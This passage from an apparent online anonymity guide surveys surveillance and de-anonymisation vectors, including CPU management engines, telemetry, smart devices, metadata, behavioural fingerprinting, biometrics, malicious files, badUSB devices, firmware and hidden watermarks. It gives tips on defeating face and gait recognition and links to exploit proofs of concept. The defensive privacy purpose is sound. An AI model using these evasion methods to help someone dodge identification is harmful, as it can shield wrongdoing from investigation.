For this reason, and unless you really need those, you should just disable Bluetooth completely in the BIOS/UEFI settings if possible or in the Operating System otherwise.
On Windows 10, you will need to disable and enable the Bluetooth device in the device manager itself to force randomization of the address for next use and prevent tracking.
In general, this should not be too much of a concern compared to MAC Addresses. BT Addresses are randomized quite often.
See Appendix N: Warning about smartphones and smart devices
All modern CPUs105 are now integrating hidden management platforms such as the now infamous Intel Management Engine106 and the AMD Platform Security Processor107.
Those management platforms are small operating systems running directly on your CPU as long as they have power. These systems have full access to your computer’s network and could be accessed by an adversary to de-anonymize you in various ways (using direct access or using malware for instance) as shown in this enlightening video: BlackHat, How to Hack a Turned-Off Computer, or Running Unsigned Code in Intel Management Engine https://www.youtube.com/watch?v=9fhNokIgBMU [Invidious].
These have already been affected by several security vulnerabilities in the past108 that allowed malware to gain control of target systems. These are also accused by many privacy actors including the EFF and Libreboot of being a backdoor into any system109.
There are some not so straightforward ways110 to disable the Intel IME on some CPUs and you should do so if you can. For some AMD laptops, you can disable it within the BIOS settings by disabling PSP.
Note that, to AMD’s defense, there were no security vulnerabilities found for ASP and no backdoors either. See https://www.youtube.com/watch?v=bKH5nGLgi08&t=2834s [Invidious]. In addition, AMD PSP does not provide any remote management capabilities contrary to Intel IME.
If you are feeling a bit more adventurous, you could install your own BIOS using Coreboot 111 or Libreboot (a distribution of Coreboot) if your laptop supports it. Coreboot allows users to add their own microcode or other firmware blobs in order for the machine to function, but this is based upon user choice, and as of Dec 2022, Libreboot has adopted a similar pragmatic approach in order to support newer devices in the Coreboot tree. (Thanks, kind Anon who corrected previous information in this paragraph.)
Check yourself:
If you are using Linux you can check the vulnerability status of your CPU to Spectre/Meltdown attacks by using https://github.com/speed47/spectre-meltdown-checker [Archive.org] which is available as a package for most Linux distros including Whonix. Spectre is a transient execution attack. There is also PoC code for Spectre v1 and v2 on iPhone devices here: https://github.com/cispa/BranchDifferent [Archive.org] and here https://misc0110.net/files/applespectre_dimva22.pdf [Archive.org]
If you are using Windows, you can check the vulnerability status of your CPU using inSpectre https://www.grc.com/inspectre.htm [Archive.org]
Some CPUs have unfixable flaws (especially Intel CPUs) that could be exploited by various malware. Here is a good current list of such vulnerabilities affecting recent widespread CPUs: https://en.wikipedia.org/wiki/Transient_execution_CPU_vulnerability [Wikiless] [Archive.org]
Some of these can be avoided using Virtualization Software settings that can mitigate such exploits. See this guide for more information https://www.whonix.org/wiki/Spectre_Meltdown [Archive.org] (warning: these can severely impact the performance of your VMs).
This guide won’t go too deep into side-channel and microarchitecture attacks but we will highlight some issues with both Intel and AMD CPU architectures that will be mitigated throughout. It’s important to recognize hardware is just as susceptible to bugs, and therefore exploitation, regardless of manufacturer.
We will mitigate some of these issues in this guide by recommending the use of virtual machines on a dedicated anonymous laptop for your sensitive activities that will only be used from an anonymous public network.
In addition, we recommend the use of AMD CPUs instead of Intel CPUs.
Whether it is Android, iOS, Windows, macOS, or even Ubuntu. Most popular Operating Systems now collect telemetry information by default even if you never opt-in or opted-out112 from the start. Some like Windows will not even allow disabling telemetry completely without some technical tweaks. This information collection can be extensive and include a staggering number of details (metadata and data) on your devices and their usage.
Here are good overviews of what is being collected by those five popular OSes in their last versions:
Android/Google:
Just have a read at their privacy policy https://policies.google.com/privacy [Archive.org]
School of Computer Science & Statistics, Trinity College Dublin, Ireland Mobile Handset Privacy: Measuring The Data iOS and Android Send to Apple And Google https://www.scss.tcd.ie/doug.leith/apple_google.pdf [Archive.org]
IOS/Apple:
More information at https://www.apple.com/legal/privacy/en-ww/ [Archive.org] and https://support.apple.com/en-us/HT202100 [Archive.org]
School of Computer Science & Statistics, Trinity College Dublin, Ireland Mobile Handset Privacy: Measuring The Data iOS and Android Send to Apple And Google https://www.scss.tcd.ie/doug.leith/apple_google.pdf [Archive.org]
Apple does claim113 that they anonymize this data using differential privacy114 but you will have to trust them on that.
Windows/Microsoft:
Full list of required diagnostic data: https://docs.microsoft.com/en-us/windows/privacy/required-windows-diagnostic-data-events-and-fields-2004 [Archive.org]
Full list of optional diagnostic data: https://docs.microsoft.com/en-us/windows/privacy/windows-diagnostic-data [Archive.org]
macOS:
Ubuntu:
Not only are Operating Systems gathering telemetry services but so are Apps themselves like Browsers, Mail Clients, and Social Networking Apps installed on your system.
It is important to understand that this telemetry data can be tied to your device and help de-anonymizing you and later can be used against you by an adversary that would get access to this data.
This does not mean for example that Apple devices are terrible choices for good Privacy (tho this might be changing115), but they are certainly not the best choices for (relative) Anonymity. They might protect you from third parties knowing what you are doing but not from themselves. In all likelihood, they certainly know who you are.
Later in this guide, we will use all the means at our disposal to disable and block as much telemetry as possible to mitigate this attack vector in the Operating Systems supported in this guide. These will include Windows, macOS, and even Linux in some regard.
See Appendix N: Warning about smartphones and smart devices
You got it; your smartphone is an advanced spying/tracking device that:
Records everything you say at any time (“Hey Siri”, “Hey Google”).
Records your location everywhere you go.
Always records other devices around you (Bluetooth devices, Wi-Fi Access points).
Records your habits and health data (steps, screen time, exposure to diseases, connected devices data)
Records all your network locations.
Records all your pictures and videos (and most likely where they were taken).
Has most likely access to most of your known accounts including social media, messaging, and financial accounts.
Data is being transmitted even if you opt-out116, processed, and stored indefinitely (most likely unencrypted117) by various third parties118.
But that is not all, this section is not called “Smartphones” but “Smart devices” because it is not only your smartphone spying on you. It is also every other smart device you could have:
Your Smart Watch? (Apple Watch, Android Smartwatch …)
Your Fitness Devices and Apps119‘120? (Strava121’122, Fitbit123, Garmin, Polar124, …)
Your Smart Speaker? (Amazon Alexa125, Google Echo, Apple Homepod …)
Your Smart Transportation? (Car? Scooter?)
Your Smart Tags? (Apple AirTag, Galaxy SmartTag, Tile…)
Your Car? (Yes, most modern cars have advanced logging/tracking features these days126)
Any other Smart device? There are even convenient search engines dedicated to finding them online:
See Appendix N: Warning about smartphones and smart devices
Conclusion: Do not bring your smart devices with you when conducting sensitive activities.
Your metadata is all the information about your activities without the actual content of those activities. For instance, it is like knowing you had a call from an oncologist before then calling your family and friends successively. You do not know what was said during the conversation, but you can guess what it was just from the metadata127.
This metadata will also often include your location that is being harvested by Smartphones, Operating Systems (Android128/IOS), Browsers, Apps, Websites. Odds are several companies are knowing exactly where you are at any time129 because of your smartphone130.
This location data has been used in many judicial cases131 already as part of “geofencing warrants” 132 that allow law enforcement to ask companies (such as Google/Apple) a list of all devices present at a certain location at a certain time. In addition, this location data is even sold by private companies to the military who can then use it conveniently133. These warrants are becoming widely used by law enforcement134‘135’136.
If you want to experience yourself what a “geofencing warrant” would look like, here is an example: https://wigle.net/.
Now let us say you are using a VPN to hide your IP. The social media platform knows you were active on that account on November 4th from 8 am to 1 pm with that VPN IP. The VPN allegedly keeps no logs and cannot trace back that VPN IP to your IP. Your ISP however knows (or at least can know) you were connected to that same VPN provider on November 4th from 7:30 am to 2 pm but does not know what you were doing with it.
The question is: Is there someone somewhere that would have both pieces of information available137 for correlation in a convenient database?
Have you heard of Edward Snowden138? Now is the time to google him and read his book139. Also read about XKEYSCORE140’141, MUSCULAR142, SORM143, Tempora144 , and PRISM145.
See “We kill people based on Metadata”146 or this famous tweet from the IDF https://twitter.com/idf/status/1125066395010699264 [Archive.org] [Nitter].
See Appendix N: Warning about smartphones and smart devices
This is the part where you should watch the documentary “The Social Dilemma”147 on Netflix as they cover this topic much better than anyone else.
This includes is the way you write (stylometry) 148‘149, the way you behave150’151. The way you click. The way you browse. The fonts you use on your browser152. Fingerprinting is being used to guess who someone is by the way that user is behaving. You might be using specific pedantic words or making specific spelling mistakes that could give you away using a simple Google search for similar features because you typed comparably on some Reddit post 5 years ago using a not so anonymous Reddit account153. The words you type in a search engine alone can be used against you as the authorities now have warrants to find users who used specific keywords in search engines154.
Social Media platforms such as Facebook/Google can go a step further and can register your behavior in the browser itself. For instance, they can register everything you type even if you do not send it / save it. Think of when you draft an e-mail in Gmail. It is saved automatically as you type. They can register your clicks and cursor movements as well.
All they need to achieve this in most cases is Javascript enabled in your browser (which is the case in most Browsers including Tor Browser by default). Even with Javascript disabled, there are still ways to fingerprint you155.
While these methods are usually used for marketing purposes and advertising, they can also be a useful tool for fingerprinting users. This is because your behavior is unique or unique enough that over time, you could be de-anonymized.
Here are some examples:
Specialized companies are selling to, for example, law enforcement agencies products for analyzing social network activities such as https://mediasonar.com/ [Archive.org]
For example, as a basis of authentication, a user’s typing speed, keystroke depressions, patterns of error (say accidentally hitting an “l” instead of a “k” on three out of every seven transactions) and mouse movements establish that person’s unique pattern of behavior156. Some commercial services such as TypingDNA (https://www.typingdna.com/ [Archive.org]) even offer such analysis as a replacement for two-factor authentications.
This technology is also widely used in CAPTCHAS157 services to verify that you are “human” and can be used to fingerprint a user.
Analysis algorithms could then be used to match these patterns with other users and match you to a different known user. It is unclear whether such data is already used or not by Governments and Law Enforcement agencies, but it might be in the future. And while this is mostly used for advertising/marketing/captchas purposes now. It could and probably will be used for investigations in the short or mid-term future to deanonymize users.
Here is a fun example you try yourself to see some of those things in action: https://clickclickclick.click (no archive links for this one sorry). You will see it becoming interesting over time (this requires Javascript enabled).
Here is also a recent example just showing what Google Chrome collects on you: https://web.archive.org/web/https://pbs.twimg.com/media/EwiUNH0UYAgLY7V?format=jpg&name=4096x4096
Here are some other resources on the topic if you cannot see this documentary:
2017, Behavior Analysis in Social Networks, https://link.springer.com/10.1007/978-1-4614-7163-9_110198-1 [Archive.org]
2017, Social Networks and Positive and Negative Affect https://www.sciencedirect.com/science/article/pii/S1877042811013747/pdf?md5=253d8f1bb615d5dee195d353dc077d46&pid=1-s2.0-S1877042811013747-main.pdf [Archive.today]
2015, Using Social Networks Data for Behavior and Sentiment Analysis https://www.researchgate.net/publication/300562034_Using_Social_Networks_Data_for_Behavior_and_Sentiment_Analysis [Archive.org]
2016, A Survey on User Behavior Analysis in Social Networks https://www.academia.edu/30936118/A_Survey_on_User_Behaviour_Analysis_in_Social_Networks [Archive.org]
2017, DEF CON 25 presentation: DEF CON 25 - Svea Eckert, Andreas Dewes - Dark Data [Invidious]
2019, Influence and Behavior Analysis in Social Networks and Social Media https://sci-hub.se/10.1007/978-3-030-02592-2 [Archive.org]
So, how can you mitigate these?
This guide will provide some technical mitigations using Fingerprinting resistant tools but those might not be sufficient.
You should apply common sense and try to find your own patterns in your behavior and behave differently when using anonymous identities. This includes:
The way you type (speed, accuracy…).
The words you use (be careful with your usual expressions).
The type of response you use (if you are sarcastic by default, try to have a different approach with your identities).
The way you use your mouse and click (try to solve the Captchas differently than your usual way)
The habits you have when using some Apps or visiting some Websites (do not always use the same menus/buttons/links to reach your content).
…
You need to act and fully adopt a role as an actor would do for a performance. You need to become a different person, think, and act like that person. This is not a technical mitigation but a human one. You can only rely on yourself for that.
Ultimately, it is mostly up to you to fool those algorithms by adopting new habits and not revealing real information when using your anonymous identities. See Appendix A4: Counteracting Forensic Linguistics.
These are clues you might give over time that could point to your real identity. You might be talking to someone or posting on some board/forum/Reddit. In those posts, you might over time leak some information about your real life. These might be memories, experiences, or clues you shared that could then allow a motivated adversary to build a profile to narrow their search.
A real use and well-documented case of this was the arrest of the hacker Jeremy Hammond158 who shared over time several details about his past and was later discovered.
There are also a few cases involving OSINT at Bellingcat159. Have a look at their very informative (but slightly outdated) toolkit here: https://docs.google.com/spreadsheets/d/18rtqh8EG2q1xBo2cLNyhIDuK9jrPGwYr9DI2UncoqJQ/edit#gid=930747607 [Archive.org]
We have an OSINT discussion room in our Matrix community. Feel free to join at #OSINT:matrix.org.
You can also view some convenient lists of some available OSINT tools here if you want to try them on yourself for example:
As well as this interesting Playlist on YouTube: https://www.youtube.com/playlist?list=PLrFPX1Vfqk3ehZKSFeb9pVIHqxqrNW8Sy [Invidious]
As well as those interesting podcasts:
https://www.inteltechniques.com/podcast.html
You should never share real individual experiences/details using your anonymous identities that could later lead to finding your real identity. You will see more details about this in the Creating new identities section.
“Hell is other people”, even if you evade every method listed above, you are not out of the woods yet thanks to the widespread use of advanced Face recognition by everyone.
Companies like Facebook have used advanced face recognition for years160’161 and have been using other means (Satellite imagery) to create maps of “people” around the world162. This evolution has been going on for years to the point we can now say “we lost control of our faces”163.
If you are walking in a touristy place, you will most likely appear in someone’s selfie within minutes without knowing it. That person could then go ahead and upload that selfie to various platforms (Twitter, Google Photos, Instagram, Facebook, Snapchat …). Those platforms will then apply face recognition algorithms to those pictures under the pretext of allowing better/easier tagging or to better organize your photo library. In addition to this, the same picture will provide a precise timestamp and in most cases geolocation of where it was taken. Even if the person does not provide a timestamp and geolocation, it can still be guessed with other means164’165.
Here are a few resources for even trying this yourself:
Bellingcat, Guide To Using Reverse Image Search For Investigations: https://www.bellingcat.com/resources/how-tos/2019/12/26/guide-to-using-reverse-image-search-for-investigations/ [Archive.org]
Bellingcat, Using the New Russian Facial Recognition Site SearchFace https://www.bellingcat.com/resources/how-tos/2019/02/19/using-the-new-russian-facial-recognition-site-searchface-ru/ [Archive.org]
Bellingcat, Dali, Warhol, Boshirov: Determining the Time of an Alleged Photograph from Skripal Suspect Chepiga https://www.bellingcat.com/resources/how-tos/2018/10/24/dali-warhol-boshirov-determining-time-alleged-photograph-skripal-suspect-chepiga/ [Archive.org]
Bellingcat, Advanced Guide on Verifying Video Content https://www.bellingcat.com/resources/how-tos/2017/06/30/advanced-guide-verifying-video-content/ [Archive.org]
Bellingcat, Using the Sun and the Shadows for Geolocation https://www.bellingcat.com/resources/2020/12/03/using-the-sun-and-the-shadows-for-geolocation/ [Archive.org]
Bellingcat, Navalny Poison Squad Implicated in Murders of Three Russian Activists https://www.bellingcat.com/news/uk-and-europe/2021/01/27/navalny-poison-squad-implicated-in-murders-of-three-russian-activists/ [Archive.org]
Bellingcat, Berlin Assassination: New Evidence on Suspected FSB Hitman Passed to German Investigators https://www.bellingcat.com/news/2021/03/19/berlin-assassination-new-evidence-on-suspected-fsb-hitman-passed-to-german-investigators/ [Archive.org]
Bellingcat, Digital Research Tutorial: Investigating a Saudi-Led Coalition Bombing of a Yemen Hospital https://www.youtube.com/watch?v=cAVZaPiVArA [Invidious]
Bellingcat, Digital Research Tutorial: Using Facial Recognition in Investigations https://www.youtube.com/watch?v=awY87q2Mr0E [Invidious]
Bellingcat, Digital Research Tutorial: Geolocating (Allegedly) Corrupt Venezuelan Officials in Europe https://www.youtube.com/watch?v=bS6gYWM4kzY [Invidious]
Even if you are not looking at the camera, they can still figure out who you are166, make out your emotions167, analyze your gait168‘169’170, read your lips171, analyze the behavior of your eyes172, and probably guess your political affiliation173’174.
Contrary to popular belief and pop culture, modern gait recognition systems aren’t fooled by simply changing how you walk (ex. with something uncomfortable in your shoe), as they analyze the way your body’s muscles move across your entire body, as you perform certain actions. The best way to fool modern gait recognition is to wear loose clothes that obscure the way your muscles move as you perform actions.
Other things than can be used to identify you include your earlobes, which are actually more identifiable than fingerprints, or even the shape of your skull. As such, soft headcoverings such as balaclavas are not recommendable for obscuring your identity - they make you look incredibly suspicious, while also conforming to the shape of your skull.
[][113]
(Illustration from https://www.nature.com/articles/s41598-020-79310-1 [Archive.org])
[][115]
(illustration from https://rd.springer.com/chapter/10.1007/978-3-030-42504-3_15 [Archive.org])
Those platforms (Google/Facebook) already know who you are for a few reasons:
Because you have or had a profile with them, and you identified yourself.
Even if you never made a profile on those platforms, you still have one without even knowing it175‘176’177‘178’179.
Because other people have tagged you or identified you in their holidays/party pictures.
Because other people have put a picture of you in their contact list which they then shared with them.
Here is also an insightful demo of Microsoft Azure you can try for yourself at https://azure.microsoft.com/en-us/services/cognitive-services/face/#demo where you can detect emotions and compare faces from different pictures.
Governments already know who you are because they have your ID/Passport/Driving License pictures and often added biometrics (Fingerprints) in their database. Those same governments are integrating those technologies (often provided by private companies such as the Israeli Oosto180, Clearview AI181‘182, or NEC183) in their CCTV networks to look for “persons of interest”184. And some heavily surveilled states like China have implemented widespread use of Facial Recognition for various purposes185’186 including possibly identifying ethnic minorities187. A simple face recognition error by some algorithm can ruin your life188’189.
Here are some resources detailing some techniques used by Law Enforcement today:
CCC video explaining current Law Enforcement surveillance capabilities: https://media.ccc.de/v/rc3-11406-spot_the_surveillance#t=761 [Archive.org]
EFF SLS: https://www.eff.org/sls [Archive.org]
Apple is making FaceID mainstream and pushing its use to log you into many services including the Banking systems.
The same goes with fingerprint authentication being mainstreamed by many smartphone makers to authenticate yourself. A simple picture where your fingers appear can be used to de-anonymize you190‘191’192’193.
The same goes with your voice which can be analyzed for various purposes as shown in the recent Spotify patent194.
Even your iris can be used for identification in some places195.
We can safely imagine a near future where you will not be able to create accounts or sign in anywhere without providing unique biometrics (A suitable time to re-watch Gattaca196, Person of Interest197 , and Minority Report198). And you can safely imagine how useful these large biometrics databases could be to some interested third parties.
In addition, all this information can also be used against you (if you are already de-anonymized) using deepfake199 by crafting false information (Pictures, Videos, Voice Recordings200…) and have already been used for such purposes201’202. There are even commercial services for this readily available such as https://www.respeecher.com/ [Archive.org] and https://www.descript.com/overdub [Archive.org].
See this demo: https://www.youtube.com/watch?v=t5yw5cR79VA [Invidious]
At this time, there are a few steps203 you can use to mitigate (and only mitigate) face recognition when conducting sensitive activities where CCTV might be present:
Wear a facemask as they have been proven to defeat some face recognition technologies204 but not all205.
Wear a baseball cap or hat to mitigate identification from high-angle CCTVs (filming from above) from recording your face. Remember this will not help against front-facing cameras.
Wear sunglasses in addition to the facemask and baseball cap to mitigate identification from your eye’s features.
Consider wearing special sunglasses (expensive, unfortunately) called “Reflectacles” https://www.reflectacles.com/ [Archive.org]. There was a small study showing their efficiency against IBM and Amazon facial recognition206.
All that might still be useless because of gait recognition mentioned earlier but there might be hope here if you have a 3D Printer: https://gitlab.com/FG-01/fg-01 [Archive.org]
(see Gait Recognition and Other Long-Range Biometrics)
(Note that if you intend to use these where advanced facial recognition systems have been installed, these measures could also flag as you as suspicious by themselves and trigger a human check)
Phishing207 is a social engineering208 type of attack where an adversary could try to extract information from you by pretending or impersonating something/someone else.
A typical case is an adversary using a man-in-the-middle209 attack or a fake e-mail/call to ask for your credential for a service. This could for example be through e-mail or through impersonating financial services.
Such attacks can also be used to de-anonymize someone by tricking them into downloading malware or revealing personal information over time. The only defense against those is not to fall for them and common sense.
These have been used countless times since the early days of the internet and the usual one is called the “419 scam” (see https://en.wikipedia.org/wiki/Advance-fee_scam [Wikiless] [Archive.org]).
Here is a good video if you want to learn a bit more about phishing types: Black Hat, Ichthyology: Phishing as a Science https://www.youtube.com/watch?v=Z20XNp-luNA [Invidious].
Using steganography or other techniques, it is easy to embed malware into common file formats such as Office Documents, Pictures, Videos, PDF documents…
These can be as simple as HTML tracking links or complex targeted malware.
These could be simple pixel-sized images210 hidden in your e-mails that would call a remote server to try and get your IP address.
These could be exploiting a vulnerability in an outdated format or an outdated reader211. Such exploits could then be used to compromise your system.
See these good videos for more explanations on the matter:
What is a File Format? https://www.youtube.com/watch?v=VVdmmN0su6E [Invidious]
Ange Albertini: Funky File Formats: https://www.youtube.com/watch?v=hdCs6bPM4is [Invidious]
You should always use extreme caution. To mitigate these attacks, this guide will later recommend the use of virtualization (See Appendix W: Virtualization) to mitigate leaking any information even in case of opening such a malicious file.
If you want to learn how to try detecting such malware, see Appendix T: Checking files for malware
So, you are using Tor Browser or Brave Browser over Tor. You could be using those over a VPN for added security. But you should keep in mind that there are exploits212 (hacks) that could be known by an adversary (but unknown to the App/Browser provider). Such exploits could be used to compromise your system and reveal details to de-anonymize you such as your IP address or other details.
A real use case of this technique was the Freedom Hosting213 case in 2013 where the FBI inserted malware214 using a Firefox browser exploit on a Tor website. This exploit allowed them to reveal details of some users. More recently, there was the notable SolarWinds215 hack that breached several US government institutions by inserting malware into an official software update server.
In some countries, Malware is just mandatory and/or distributed by the state itself. This is the case for instance in China with WeChat216 which can then be used in combination with other data for state surveillance217.
There are countless examples of malicious browser extensions, smartphone apps, and various apps that have been infiltrated with malware over the years.
Here are some steps to mitigate this type of attack:
You should never have 100% trust in the apps you are using.
You should always check that you are using the updated version of such apps before use and ideally validate each download using their signature if available.
You should not use such apps directly from a hardware system but instead, use a Virtual Machine for compartmentalization.
To reflect these recommendations, this guide will therefore later guide you in the use of Virtualization (See Appendix W: Virtualization) so that even if your Browser/Apps get compromised by a skilled adversary, that adversary will find himself stuck in a sandbox218 without being able to access identifying information or compromise your system.
There are readily available commercial and cheap “badUSB” 219devices that can take deploy malware, log your typing, geolocate you, listen to you or gain control of your laptop just by plugging them in. Here are some examples that you can already buy yourself:
Hak5, USB Rubber Ducky https://shop.hak5.org/products/usb-rubber-ducky-deluxe [Archive.org]
Hak5, O.MG Cable https://www.youtube.com/watch?v=V5mBJHotZv0 [Invidious]
AliExpress https://www.aliexpress.com/i/4000710369016.html [Archive.org]
Such devices can be implanted anywhere (charging cable, mouse, keyboard, USB key …) by an adversary and can be used to track you or compromise your computer or smartphone. The most notable example of such attacks is probably Stuxnet220 in 2005.
While you could inspect a USB key physically, scan it with various utilities, check the various components to see if they are genuine, you will most likely never be able to discover complex malware embedded in genuine parts of a genuine USB key by a skilled adversary without advanced forensics equipment221.
To mitigate this, you should never trust such devices and plug them into sensitive equipment. If you use a charging device, you should consider the use of a USB data blocking device that will only allow charging but not any data transfer. Such data blocking devices are now readily available in many online shops. You should also consider disabling USB ports completely within the BIOS of your computer unless you need them (if you can).
This might sound a bit familiar as this was already partially covered previously in the Your CPU section.
Malware and backdoors can be embedded directly into your hardware components. Sometimes those backdoors are implemented by the manufacturer itself such as the IME in the case of Intel CPUs. And in other cases, such backdoors can be implemented by a third party that places itself between orders of new hardware and customer delivery222.
Such malware and backdoors can also be deployed by an adversary using software exploits. Many of those are called rootkits223 within the tech world. Usually, these types of malware are harder to detect and mitigate as they are implemented at a lower level than the userspace224 and often in the firmware225 of hardware components itself.
What is firmware? Firmware is a low-level operating system for devices. Each component in your computer probably has firmware including for instance your disk drives. The BIOS226/UEFI227 system of your machine for instance is a type of firmware.
These can allow remote management and are capable of enabling full control of a target system silently and stealthily.
As mentioned previously, these are harder to detect by users but some limited steps that can be taken to mitigate some of those by protecting your device from tampering and use some measures (like re-flashing the bios for example). Unfortunately, if such malware or backdoor is implemented by the manufacturer itself, it becomes extremely difficult to detect and disable those.
This can be obvious to many but not to all. Most files have metadata attached to them. Good examples are pictures that store EXIF228 information which can hold a lot of information such as GPS coordinates, which camera/phone model took it, and when it was taken precisely. While this information might not directly give out who you are, it could tell exactly where you were at a certain moment which could allow others to use various sources to find you (CCTV or other footage taken at the same place at the same time during a protest for instance). You must verify any file you would put on those platforms for any properties that might hold any information that might lead back to you.
Here is an example of EXIF data that could be on a picture:
[][133]
(Illustration from Wikipedia)
This also works for videos. Yes, videos too have geo-tagging, and many are very unaware of this. Here Is for instance a very convenient tool to geo-locate YouTube videos: https://mattw.io/youtube-geofind/location [Archive.org]
For this reason, you will always have to be incredibly careful when uploading files using your anonymous identities and check the metadata of those files.
Even if you publish a plain text file, you should always double or triple-check it for any information leakage before publishing. You will find some guidance about this in the Some additional measures against forensics section at the end of the guide.
Pictures/Videos often contain visible watermarks indicating who is the owner/creator but there are also invisible watermarks in various products aiming at identifying the viewer itself.
So, if you are a whistleblower and thinking about leaking some picture/audio/video file. Think twice. There are chances that those might contain invisible watermarking within them that would include information about you as a viewer. Such watermarks can be enabled with a simple switch in like Zoom (Video229 or Audio230) or with extensions231 for popular apps such as Adobe Premiere Pro. These can be inserted by various content management systems.
For a recent example where someone leaking a Zoom meeting recording was caught because it was watermarked: https://theintercept.com/2021/01/18/leak-zoom-meeting/ [Tor Mirror] [Archive.org]
Such watermarks can be inserted by various products232‘233’234‘235 using Steganography236 and can resist compression237 and re-encoding238’239.
These watermarks are not easily detectable and could allow identification of the source despite all efforts.
In addition to watermarks, the camera used for filming (and therefore the device used for filming) a video can also be identified using various techniques such as lens identification240 which could lead to de-anonymization.
Be extremely careful when publishing videos/pictures/audio files from known commercial platforms as they might contain such invisible watermarks in addition to details in the images themselves. There is no guaranteed 100% protection against those. You will have to use common sense.
Did you know your printer is most likely spying on you too? Even if it is not connected to any network? This is usually a known fact by many people in the IT community but few outside people.
Yes … Your printers can be used to de-anonymize you as well as explained by the EFF here https://www.eff.org/issues/printers [Archive.org]
With this (old but still relevant) video explaining how from the EFF as well: https://www.youtube.com/watch?v=izMGMsIZK4U [Invidious]
Many printers will print an invisible watermark allowing for identification of the printer on every printed page. This is called Printer Steganography241. There is no tangible way to mitigate this but to inform yourself on your printer and make sure it does not print any invisible watermark. This is important if you intend to print anonymously.
Here is an (old but still relevant) list of printers and brands who do not print such tracking dots provided by the EFF https://www.eff.org/pages/list-printers-which-do-or-do-not-display-tracking-dots [Archive.org]
Here are also some tips from the Whonix documentation (https://www.whonix.org/wiki/Printing_and_Scanning [Archive.org]):
Do not ever print in Color, usually, watermarks are not present without color toners/cartridges242.
Did you ever see a document with blurred text? Did you ever make fun of those movies/series where they “enhance” an image to recover seemingly impossible-to-read information?
Well, there are techniques for recovering information from such documents, videos, and pictures.
Here is for example an open-source project you could use yourself for recovering text from some blurred images yourself: https://github.com/beurtschipper/Depix [Archive.org]
This is of course an open-source project available for all to use. But you can imagine that such techniques have probably been used before by other adversaries. These could be used to reveal blurred information from published documents that could then be used to de-anonymize you.
There are also tutorials for using such techniques using Photo Editing tools such as GIMP such as https://medium.com/@somdevsangwan/unblurring-images-for-osint-and-more-part-1-5ee36db6a70b [Archive.org] followed by https://medium.com/@somdevsangwan/deblurring-images-for-osint-part-2-ba564af8eb5d [Scribe.rip] [Archive.org]